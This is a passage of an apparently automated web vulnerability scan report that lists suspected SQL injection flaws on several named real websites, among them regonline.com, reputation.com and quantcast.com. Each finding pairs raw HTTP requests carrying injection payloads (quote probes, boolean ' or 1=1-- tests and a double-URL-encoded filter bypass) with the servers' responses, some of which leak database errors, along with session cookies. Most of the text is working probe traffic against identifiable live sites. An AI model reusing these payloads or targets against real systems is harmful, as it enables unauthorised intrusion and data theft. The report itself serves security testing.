Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /obits/?chid=directory' HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:15:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:15:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 47581

...[SNIP]...
<img src="http://media.komonews.com/images/68*69/flora-1.jpg" width="68" height="69" class="thumb" alt="" title="Orquieza, Flora" />
...[SNIP]...

1.10. http://www.nutter.com/careers.php [CategoryID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=23' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:29:22 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 1168

<!-- careers start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC
...[SNIP]...

1.11. http://www.quantcast.com/google.com [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.quantcast.com
Path:   /google.com

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /google.com;jsessionid=902C2D61E83AC8A548758F5A7FBE1018?country=US HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=474FF8A3747940CE0B8EDFC5B898F977; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; qcPageID=0; __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.4.8.1298496835385; __qca=P0-1138661367-1297862290557; qcVisitor=2|47|1297862270597|16|NOTSET;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F6238EBA188B9B06E60C1A2895758847; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 22:28:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

Request 2

GET /google.com;jsessionid=902C2D61E83AC8A548758F5A7FBE1018?country=US HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=474FF8A3747940CE0B8EDFC5B898F977; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; qcPageID=0; __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.4.8.1298496835385; __qca=P0-1138661367-1297862290557; qcVisitor=2|47|1297862270597|16|NOTSET;

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: qcVisitor=2|47|1297862270597|17|NOTSET; Expires=Fri, 15-Feb-2041 22:28:24 GMT; Path=/
Date: Wed, 23 Feb 2011 22:28:29 GMT
Expires: Wed, 23 Feb 2011 23:28:29 GMT
Cache-control: public, max-age=3600
Public-page: true
Set-Cookie: JSESSIONID=4940571E868B65E8BD057596DE8BD271; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/
...[SNIP]...

1.12. http://www.regonline.com/Register/Checkin.aspx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payloads 14542449'%20or%201%3d1--%20 and 14542449'%20or%201%3d2--%20 were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d1--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ylqsom55dwxvaxewcebgk5iy; path=/; HttpOnly
Content-Length: 24814

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Form</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Forms</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountC
...[SNIP]...

Request 2

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d2--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=rkn4yuum3fm5n3b5w0ceui45; path=/; HttpOnly
Content-Length: 24790

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.activegovernment.com/marketing-services/municipal-marketing.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Municipal Marketing</a>
                       |
                   <a href="http://www.activeendurance.com/running.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Running Software</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountCode';
       var regTypeDDLI
...[SNIP]...

1.13. https://www.regonline.com/Register/WebResource.axd [CurrentROLSession cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.regonline.com
Path:   /Register/WebResource.axd

Issue detail

The CurrentROLSession cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CurrentROLSession cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CurrentROLSession cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:19 GMT
Connection: close
X-Powered-By: ASP.NET
Content-Length: 19098


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title>


...[SNIP]...
<img src="/__images/global/ErrorImage.jpg" alt="404 Error" />
...[SNIP]...

Request 2

GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response 2

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:19 GMT
Location: https://regonline.activeeurope.com/__404.aspx
Connection: close
Content-Length: 162

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://regonline.activeeurope.com/__404.aspx">here</a>.</h2>
</body></html>

1.14. http://www.reputation.com/ [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:51:37 GMT; path=/; domain=www.reputation.com
Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:51:37 GMT; path=/
Vary: Accept-Encoding
Content-Length: 107121
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.1098530292511
...[SNIP]...

1.15. http://www.reputation.com/blog/ [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /blog/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; _bizo_cksm_crc32=2672111A; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_np_stats=753%3D184%2C; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.3.9.1303177777739

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:53:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /blog/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; _bizo_cksm_crc32=2672111A; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_np_stats=753%3D184%2C; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.3.9.1303177777739

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:53:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:53:43 GMT; path=/
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:53:44 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 141597
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.16. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/blog/?s=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4dacec4601ec9; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=B0F0FDA5; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.52.9.1303178295497; _bizo_np_stats=753%3D280%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A7%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A7%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A7

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:12:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/blog/?s=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4dacec4601ec9; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=B0F0FDA5; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.52.9.1303178295497; _bizo_np_stats=753%3D280%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A7%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A7%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A7

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:12:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
